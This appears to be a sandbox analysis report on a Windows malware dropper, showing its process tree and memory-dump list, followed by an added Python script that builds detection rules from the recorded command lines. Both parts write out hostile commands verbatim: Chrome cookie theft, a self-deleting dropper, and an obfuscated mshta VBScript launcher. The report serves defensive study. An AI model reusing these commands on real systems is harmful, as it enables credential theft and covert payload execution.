          Sun10ee0af6c65e215a.exe
          5⤵
          • Executes dropped EXE
          PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun106a84a94b0.exe
        4⤵
        PID:1636
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun106a84a94b0.exe
          Sun106a84a94b0.exe
          5⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
          • C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe
            "C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe"
            6⤵
            • Executes dropped EXE
            PID:1812
          • C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe
            "C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe"
            6⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:2932
            • C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe
              "C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe"
              7⤵
              • Executes dropped EXE
              PID:4912
          • C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe
            "C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe"
            6⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4288
          • C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe
            "C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe"
            6⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4416
          • C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe
            "C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe"
            6⤵
            • Executes dropped EXE
            PID:4500
            • C:\Users\Admin\AppData\Roaming\2480812.exe
              "C:\Users\Admin\AppData\Roaming\2480812.exe"
              7⤵
              PID:1308
              • C:\Windows\SysWOW64\control.exe
                "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
                8⤵
                PID:1884
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
                  9⤵
                  PID:4856
                  • C:\Windows\system32\RunDll32.exe
                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
                    10⤵
                    PID:4984
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
                      11⤵
                      PID:4380
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun10fe8cb62035134.exe
        4⤵
        PID:1668
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe
          Sun10fe8cb62035134.exe
          5⤵
          • Executes dropped EXE
          PID:2424
          • C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp" /SL5="$101F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe"
            6⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1208
            • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe
              "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT
              7⤵
              • Executes dropped EXE
              PID:3304
              • C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp" /SL5="$1020C,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT
                8⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • Suspicious use of FindShellTrayWindow
                PID:1348
                • C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe" 77
                  9⤵
                  • Executes dropped EXE
                  PID:4308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun10de08ca9cb.exe
        4⤵
        PID:1452
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10de08ca9cb.exe
          Sun10de08ca9cb.exe
          5⤵
          • Executes dropped EXE
          PID:3456
          • C:\Windows\SysWOW64\control.exe
            "C:\Windows\System32\control.exe" .\2c3M8M5c.RJ
            6⤵
            PID:1344
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
              7⤵
              • Loads dropped DLL
              PID:1268
              • C:\Windows\system32\RunDll32.exe
                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
                8⤵
                PID:5312
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ
                  9⤵
                  PID:4076
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun10f51ad6615.exe
        4⤵
        PID:1332
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exe
          Sun10f51ad6615.exe
          5⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          PID:2240
          • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exe
            C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exe
            6⤵
            • Executes dropped EXE
            PID:4116
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun10f1b87ddac.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:1268
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun10fd677cdc.exe
        4⤵
        PID:1440
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fd677cdc.exe
          Sun10fd677cdc.exe
          5⤵
          • Executes dropped EXE
          PID:3488
          • C:\Users\Admin\AppData\Local\Temp\11111.exe
            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            • Executes dropped EXE
            PID:1392
          • C:\Users\Admin\AppData\Local\Temp\11111.exe
            C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            6⤵
            • Executes dropped EXE
            PID:4656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sun1084932dd6b.exe /mixtwo
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3612
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exe
                                                                                                                                                                                                  Sun1084932dd6b.exe /mixtwo
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:1844
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe
                                                                                                                                                                                          Sun1050791613c996ff.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:2916
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe" -u
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2208
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f1b87ddac.exe
                                                                                                                                                                                          Sun10f1b87ddac.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:1256
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exe
                                                                                                                                                                                          Sun1084932dd6b.exe /mixtwo
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3932
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1084932dd6b.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exe" & exit
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4472
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /im "Sun1084932dd6b.exe" /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:4348
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:1448
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5116
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4356
                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5980
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5756
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:6164
                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5972
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3796
                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5956
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"> ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "" == "" for %e In ( "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe" ) do taskkill /iM "%~Nxe" -f
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE
                                                                                                                                                                                                                  ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill /iM "m3GJY76KHkrUvSQv6yEtaHM4.exe" -f
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst2.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5944
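
The tree above records several behaviours worth a detection rule: a NirSoft-style viewer pointed at the Chrome Cookies database and told to save as text (/CookiesFile, /scookiestxt, /stab), a cmd.exe that kills and erases its own dropper, rundll32 loading a DLL out of %TEMP%, and an mshta wrapper whose mixed-case VBScript hands cmd.exe a TYPE-redirect-then-START copy of a file in the user's Pictures folder. The Python below is an added example, not part of the sandbox report: it rebuilds a handful of process-creation events from the page's own image paths, command lines and PIDs (parents the page does not show are recorded as PID 0, a placeholder), runs simple rules over them, reports the parent chain for each hit, and recovers the command passed to WScript.Shell.Run from the mshta line by undoubling VBScript's "" quote escapes. The rule names and messages are my own.

```python
"""Triage rules over process-creation events reconstructed from the tree above.

Added example, not from the sandbox report. Events are constructed from the
report's own paths, command lines and PIDs; a parent not shown on this page is
recorded as ppid 0 (placeholder). Rule names and messages are the author's own.
"""
import re
from dataclasses import dataclass

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
COOKIES = r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies"
# Copied verbatim from the tree: the mshta wrapper and the cmd.exe it spawned.
MSHTA_CMDLINE = r'"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )'
CMD_CHILD_CMDLINE = r'"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"> ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "" == "" for %e In ( "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe" ) do taskkill /iM "%~Nxe" -f'


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int      # 0 = parent not shown on this page (placeholder)
    image: str
    cmdline: str


# Constructed from the process tree; PID 4356 (svchost) is the benign control.
EVENTS = [
    ProcEvent(3488, 1440, TEMP + r"\7zSCDB5A586\Sun10fd677cdc.exe", "Sun10fd677cdc.exe"),
    ProcEvent(1392, 3488, TEMP + r"\11111.exe", f'{TEMP}\\11111.exe /CookiesFile "{COOKIES}" /scookiestxt {TEMP}\\fj4ghga23_fsa.txt'),
    ProcEvent(4656, 3488, TEMP + r"\11111.exe", f"{TEMP}\\11111.exe /stab {TEMP}\\fj4ghga23_fsa.txt"),
    ProcEvent(3932, 0, TEMP + r"\7zSCDB5A586\Sun1084932dd6b.exe", "Sun1084932dd6b.exe /mixtwo"),
    ProcEvent(4472, 3932, r"C:\Windows\SysWOW64\cmd.exe", f'"C:\\Windows\\System32\\cmd.exe" /c taskkill /im "Sun1084932dd6b.exe" /f & erase "{TEMP}\\7zSCDB5A586\\Sun1084932dd6b.exe" & exit'),
    ProcEvent(1448, 0, r"C:\Windows\system32\rundll32.exe", f'rundll32.exe "{TEMP}\\sqlite.dll",global'),
    ProcEvent(4356, 0, r"C:\Windows\system32\svchost.exe", r"C:\Windows\system32\svchost.exe -k SystemNetworkService"),
    ProcEvent(5956, 0, r"C:\Windows\SysWOW64\mshta.exe", MSHTA_CMDLINE),
    ProcEvent(4588, 5956, r"C:\Windows\SysWOW64\cmd.exe", CMD_CHILD_CMDLINE),
    ProcEvent(5572, 4588, TEMP + r"\ZCJQBxDe1bLl.exE", r"..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe"),
]

USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\[^\\]+\\Pictures)\\", re.I)


def _is(e, name):
    return e.image.lower().endswith("\\" + name)


def rule_user_writable_image(e):
    return "image executed from user-writable path" if USER_WRITABLE.search(e.image) else None


def rule_cookie_dump_tool(e):
    # /CookiesFile, /scookiestxt, /stab: NirSoft-style switches that point a browser
    # data viewer at a Chrome Cookies DB and save the result as a text file.
    if re.search(r"/(CookiesFile|scookiestxt|stab)\b", e.cmdline, re.I):
        return "browser cookie/credential dump to text file"
    return None


def rule_self_delete(e):
    c = e.cmdline.lower()
    if _is(e, "cmd.exe") and "taskkill" in c and re.search(r"\b(erase|del)\b", c):
        return "taskkill + erase: dropper removing itself"
    return None


def rule_rundll32_user_dll(e):
    if _is(e, "rundll32.exe") and USER_WRITABLE.search(e.cmdline):
        return "rundll32 loading DLL from user-writable path"
    return None


def rule_mshta_inline(e):
    # Case-insensitive: the sample mixes case ("vbsCrIPT:") to dodge naive matching.
    if _is(e, "mshta.exe") and re.search(r"\b(vbscript|javascript):", e.cmdline, re.I):
        return "mshta executing inline script"
    return None


def rule_type_redirect_start(e):
    # TYPE <src> > <dst> && START <dst>: copy by redirection, then launch the copy.
    if _is(e, "cmd.exe") and re.search(r"\btype\b.*>\s*\S+.*\bstart\b", e.cmdline, re.I):
        return "copy via TYPE redirection then START of the copy"
    return None


RULES = [rule_user_writable_image, rule_cookie_dump_tool, rule_self_delete,
         rule_rundll32_user_dll, rule_mshta_inline, rule_type_redirect_start]


def ancestry(events, pid):
    """Parent chain as lower-cased image basenames, root first; stops at a parent not in the log."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid].ppid
    return " -> ".join(reversed(chain))


def mshta_run_argument(cmdline):
    """Recover the command WScript.Shell.Run receives from an mshta vbscript: wrapper.
    VBScript writes a literal quote inside a string literal as "", so undouble them."""
    m = re.search(r'\.Run\s*\(\s*"((?:[^"]|"")*)"', cmdline, re.I)
    return m.group(1).replace('""', '"').strip() if m else None


def triage(events):
    """Map pid -> {"chain": parent chain, "hits": rule messages} for every event a rule flags."""
    findings = {}
    for e in events:
        hits = [h for h in (rule(e) for rule in RULES) if h]
        if hits:
            findings[e.pid] = {"chain": ancestry(events, e.pid), "hits": hits}
    return findings


if __name__ == "__main__":
    for pid, f in triage(EVENTS).items():
        print(pid, f["chain"], f["hits"])
    print(mshta_run_argument(MSHTA_CMDLINE))
```

The rules are deliberately narrow string matches so each one maps to a single line of the tree; in production they would run over Sysmon event 1 or EDR process-creation telemetry rather than a hand-built list, and the parent-chain lookup is what turns "cmd.exe ran taskkill" into "the mshta-launched cmd.exe ran taskkill".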

Network

MITRE ATT&CK Enterprise v6

Downloads

• memory/428-507-0x000001E18C640000-0x000001E18C6B2000-memory.dmp
  Filesize: 456KB
• memory/628-274-0x0000000000400000-0x0000000000535000-memory.dmp
  Filesize: 1.2MB
• memory/628-271-0x0000000002240000-0x0000000002319000-memory.dmp
  Filesize: 868KB
• memory/628-269-0x0000000000726000-0x00000000007A2000-memory.dmp
  Filesize: 496KB
• memory/740-609-0x0000000000C20000-0x0000000000D6A000-memory.dmp
  Filesize: 1.3MB
• memory/988-226-0x00000000046D0000-0x00000000046D1000-memory.dmp
  Filesize: 4KB
• memory/988-250-0x0000000004BD2000-0x0000000004BD3000-memory.dmp
  Filesize: 4KB
• memory/988-317-0x0000000007A20000-0x0000000007A21000-memory.dmp
  Filesize: 4KB
• memory/988-481-0x0000000004BD3000-0x0000000004BD4000-memory.dmp
  Filesize: 4KB
• memory/988-240-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
  Filesize: 4KB
• memory/988-440-0x000000007F740000-0x000000007F741000-memory.dmp
  Filesize: 4KB
• memory/988-221-0x00000000046D0000-0x00000000046D1000-memory.dmp
  Filesize: 4KB
• memory/988-276-0x0000000007280000-0x0000000007281000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/988-238-0x00000000072B0000-0x00000000072B1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/988-232-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-278-0x0000000007830000-0x0000000007831000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-478-0x00000000045E3000-0x00000000045E4000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-242-0x00000000045E0000-0x00000000045E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-437-0x000000007EF90000-0x000000007EF91000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-228-0x0000000002BA0000-0x0000000002BA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-224-0x0000000002BA0000-0x0000000002BA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-280-0x00000000078A0000-0x00000000078A1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-290-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1056-251-0x00000000045E2000-0x00000000045E3000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1064-553-0x000000002F890000-0x000000002F949000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        740KB

                                                                                                                                                                                                                      • memory/1064-477-0x0000000004750000-0x0000000004751000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1092-537-0x0000020674A20000-0x0000020674A92000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                      • memory/1184-544-0x000001FED0240000-0x000001FED02B2000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                      • memory/1208-249-0x0000000000780000-0x00000000008CA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                      • memory/1256-272-0x00000000005C0000-0x000000000070A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                      • memory/1256-270-0x0000000000796000-0x00000000007A6000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1256-273-0x0000000000400000-0x00000000004C8000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        800KB

                                                                                                                                                                                                                      • memory/1260-580-0x0000021DB7720000-0x0000021DB7792000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                      • memory/1268-547-0x000000002FD30000-0x000000002FDEA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        744KB

                                                                                                                                                                                                                      • memory/1268-557-0x000000002FEB0000-0x000000002FF69000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        740KB

                                                                                                                                                                                                                      • memory/1268-476-0x0000000003580000-0x0000000003581000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1348-266-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1372-582-0x000001D1030C0000-0x000001D103132000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                      • memory/1392-299-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        340KB

                                                                                                                                                                                                                      • memory/1456-550-0x0000024318770000-0x00000243187E2000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                      • memory/1516-253-0x0000000005400000-0x0000000005401000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1516-289-0x0000000005B10000-0x0000000005B11000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1516-255-0x0000000001320000-0x0000000001321000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1516-229-0x0000000000A00000-0x0000000000A01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1608-247-0x000000001BD00000-0x000000001BD02000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/1608-237-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1608-220-0x0000000000E90000-0x0000000000E91000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1680-386-0x0000000003A60000-0x0000000003BAE000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                      • memory/1812-298-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1812-330-0x0000000005370000-0x0000000005371000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1812-314-0x0000000005300000-0x0000000005360000-memory.dmp

    Filesize 384KB

• memory/1812-320-0x0000000002B10000-0x0000000002B11000-memory.dmp    Filesize 4KB
• memory/1812-287-0x0000000000B20000-0x0000000000B21000-memory.dmp    Filesize 4KB
• memory/1900-561-0x00000117155B0000-0x0000011715622000-memory.dmp    Filesize 456KB
• memory/2240-267-0x00000000031E0000-0x00000000031E1000-memory.dmp    Filesize 4KB
• memory/2240-227-0x0000000000DE0000-0x0000000000DE1000-memory.dmp    Filesize 4KB
• memory/2240-243-0x00000000057F0000-0x00000000057F1000-memory.dmp    Filesize 4KB
• memory/2240-245-0x0000000003050000-0x0000000003051000-memory.dmp    Filesize 4KB
• memory/2240-259-0x0000000005650000-0x0000000005651000-memory.dmp    Filesize 4KB
